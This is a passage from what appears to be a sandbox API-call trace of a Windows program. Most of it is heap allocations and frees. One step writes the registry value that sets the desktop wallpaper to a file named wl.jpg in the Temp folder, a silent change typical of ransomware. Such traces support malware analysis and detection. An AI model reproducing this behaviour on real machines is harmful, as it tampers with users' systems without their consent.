wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0225.556] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab608 [0225.556] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6c8 [0225.556] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72388 [0225.556] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab620 [0225.556] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0225.556] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab638 [0225.556] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72208 [0225.556] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5a8 [0225.556] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72208 | out: hHeap=0x2af0000) returned 1 [0225.556] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab458 [0225.556] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0225.556] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5f0 [0225.556] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0225.556] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab650 [0225.556] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721f8 [0225.556] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0225.556] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab668 [0225.556] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72218 [0225.556] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab698 [0225.556] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0225.556] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x29f7878 [0225.556] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72348 [0225.556] CharUpperBuffW (in: lpsz="tempdir", cchLength=0x7 | out: lpsz="TEMPDIR") returned 0x7 [0225.557] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab680 [0225.557] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab590 [0225.557] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab5c0 [0225.557] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab470 [0225.557] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab680 | out: hHeap=0x2af0000) returned 1 [0225.557] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab680 [0225.557] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72358 [0225.557] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x8cf438 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\") returned 0x23 [0225.557] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab488 [0225.557] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x50) returned 0x29eb0b0 [0225.557] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722c8 [0225.557] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72358 | out: hHeap=0x2af0000) returned 1 [0225.557] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0225.557] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0225.557] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab470 | out: hHeap=0x2af0000) returned 1 [0225.557] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5c0 | out: hHeap=0x2af0000) returned 1 [0225.557] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab680 | out: hHeap=0x2af0000) returned 1 [0225.557] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab590 | out: hHeap=0x2af0000) returned 1 [0225.557] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab698 | out: hHeap=0x2af0000) returned 1 [0225.557] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab668 | out: hHeap=0x2af0000) returned 1 [0225.557] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0225.557] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0225.557] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f70e0 [0225.557] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab440 [0225.557] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xb0) returned 0x29f7878 [0225.557] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29eb0b0 | out: hHeap=0x2af0000) returned 1 [0225.558] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab440 | out: hHeap=0x2af0000) returned 1 [0225.558] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f70e0 | out: hHeap=0x2af0000) returned 1 [0225.558] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0225.558] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0225.559] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab548 [0225.559] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72218 [0225.559] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab668 [0225.559] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72358 [0225.559] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4b8 [0225.559] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72228 [0225.559] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0225.559] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72288 [0225.559] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4b8 | out: hHeap=0x2af0000) returned 1 [0225.559] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x30) returned 0x2a73290 [0225.559] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de40 | out: hHeap=0x2af0000) returned 1 [0225.559] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0225.559] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72248 [0225.559] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab680 [0225.559] CharUpperBuffW (in: lpsz="HKCU", cchLength=0x4 | out: lpsz="HKCU") returned 0x4 [0225.559] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab500 [0225.560] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722b8 [0225.560] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0225.560] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722b8 | out: hHeap=0x2af0000) returned 1 [0225.560] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab680 | out: hHeap=0x2af0000) returned 1 [0225.560] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72248 | out: hHeap=0x2af0000) returned 1 [0225.560] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="Control Panel\\Desktop", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0x20006, lpSecurityAttributes=0x0, phkResult=0x8cf850, lpdwDisposition=0x8cf86c | out: phkResult=0x8cf850*=0x520, lpdwDisposition=0x8cf86c*=0x2) returned 0x0 [0225.560] RegSetValueExW (in: hKey=0x520, lpValueName="Wallpaper", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\wl.jpg", cbData=0x54 | out: lpData="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\wl.jpg") returned 0x0 [0225.588] RegCloseKey (hKey=0x520) returned 0x0 [0225.588] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73290 | out: hHeap=0x2af0000) returned 1 [0225.588] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0225.588] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab668 | out: hHeap=0x2af0000) returned 1 [0225.588] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72358 | out: hHeap=0x2af0000) returned 1 [0225.588] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab548 | out: hHeap=0x2af0000) returned 1 [0225.588] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0225.588] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab620 | out: hHeap=0x2af0000) returned 1 [0225.588] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6c8 | out: hHeap=0x2af0000) returned 1 [0225.589] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5a8 | out: hHeap=0x2af0000) returned 1 [0225.589] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab638 | out: hHeap=0x2af0000) returned 1 [0225.589] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5f0 | out: hHeap=0x2af0000) returned 1 [0225.589] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab458 | out: hHeap=0x2af0000) returned 1 [0225.589] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0225.589] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0225.589] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab488 | out: hHeap=0x2af0000) returned 1 [0225.589] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab650 | out: hHeap=0x2af0000) returned 1 [0225.589] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab608 | out: hHeap=0x2af0000) returned 1 [0225.589] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0225.590] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d28 [0225.590] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721d8 [0225.590] CharUpperBuffW (in: lpsz="A0F00F04C39", cchLength=0xb | out: lpsz="A0F00F04C39") returned 0xb [0225.590] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d28 | out: hHeap=0x2af0000) returned 1 [0225.590] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0225.590] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4a0 [0225.590] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72228 [0225.590] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab710 [0225.590] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5a8 [0225.591] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72218 [0225.592] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0225.592] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72238 [0225.592] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4b8 [0225.592] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722d8 [0225.592] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab728 [0225.592] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab488 [0225.592] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72338 [0225.592] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab518 [0225.592] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0225.592] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab518 | out: hHeap=0x2af0000) returned 1 [0225.592] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab488 | out: hHeap=0x2af0000) returned 1 [0225.592] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab728 | out: hHeap=0x2af0000) returned 1 [0225.592] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0225.592] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab458 [0225.592] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d28 [0225.592] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6b0 [0225.592] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72338 [0225.592] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6b0 | out: hHeap=0x2af0000) returned 1 [0225.593] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c38 [0225.593] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5c0 [0225.593] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77bc0 [0225.593] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4e8 [0225.593] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72348 [0225.593] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4e8 | out: hHeap=0x2af0000) returned 1 [0225.593] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c88 [0225.593] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4d0 [0225.593] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4e8 [0225.593] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab500 [0225.593] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab518 [0225.593] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72268 [0225.593] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0225.593] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77dc8 [0225.593] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0225.593] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72298 [0225.593] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0225.593] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77af8 [0225.593] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab470 [0225.593] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0225.593] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab518 | out: hHeap=0x2af0000) returned 1 [0225.593] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4e8 | out: hHeap=0x2af0000) returned 1 [0225.593] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5d8 [0225.593] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab548 [0225.593] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab638 [0225.593] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72358 [0225.594] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72358 | out: hHeap=0x2af0000) returned 1 [0225.594] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b20 [0225.594] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab500 [0225.594] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722a8 [0225.594] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0225.594] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e18 [0225.594] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab488 [0225.594] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab548 | out: hHeap=0x2af0000) returned 1 [0225.594] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab638 | out: hHeap=0x2af0000) returned 1 [0225.594] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5d8 | out: hHeap=0x2af0000) returned 1 [0225.594] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0225.594] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0225.594] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0225.594] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72208 [0225.594] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5f0 [0225.594] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4e8 [0225.594] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0225.594] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0225.594] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0225.594] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722b8 [0225.594] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d50 [0225.594] CharUpperBuffW (in: lpsz="SSA0F00F04C39", cchLength=0xd | out: lpsz="SSA0F00F04C39") returned 0xd [0225.594] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d50 | out: hHeap=0x2af0000) returned 1 [0225.594] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722b8 | out: hHeap=0x2af0000) returned 1 [0225.594] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0225.595] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4e8 | out: hHeap=0x2af0000) returned 1 [0225.595] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5f0 | out: hHeap=0x2af0000) returned 1 [0225.595] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72208 | out: hHeap=0x2af0000) returned 1 [0225.595] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0225.595] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e800 [0225.595] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0225.595] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6b0 [0225.595] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72398 [0225.595] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6b0 | out: hHeap=0x2af0000) returned 1 [0225.595] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e40 [0225.595] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab500 [0225.595] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab698 [0225.595] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72248 [0225.595] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ad0 [0225.595] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6e0 [0225.595] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72328 [0225.595] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6e0 | out: hHeap=0x2af0000) returned 1 [0225.595] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cb0 [0225.595] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab608 [0225.595] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4e8 [0225.595] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0225.595] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0225.595] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d00 [0225.595] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722f8 [0225.595] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0225.595] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d00 | out: hHeap=0x2af0000) returned 1 [0225.596] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0225.596] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0225.596] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72268 [0225.596] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab500 [0225.596] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab518 [0225.596] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72318 [0225.596] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72378 [0225.596] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72378 | out: hHeap=0x2af0000) returned 1 [0225.596] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab548 [0225.596] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72318 | out: hHeap=0x2af0000) returned 1 [0225.596] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab560 [0225.596] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e68 [0225.596] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 [0225.596] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72358 [0225.596] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0225.596] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b70 [0225.596] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 [0225.596] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab590 [0225.596] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0225.596] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0225.596] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5d8 [0225.596] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72258 [0225.596] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5d8 | out: hHeap=0x2af0000) returned 1 [0225.596] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c10 [0225.596] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5d8 [0225.596] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab728 [0225.597] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721e8 [0225.597] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77eb8 [0225.597] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5f0 [0225.597] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72318 [0225.597] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5f0 | out: hHeap=0x2af0000) returned 1 [0225.597] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ee0 [0225.597] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab440 [0225.597] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6b0 [0225.597] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c10 | out: hHeap=0x2af0000) returned 1 [0225.597] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72258 | out: hHeap=0x2af0000) returned 1 [0225.597] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5d8 | out: hHeap=0x2af0000) returned 1 [0225.597] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: 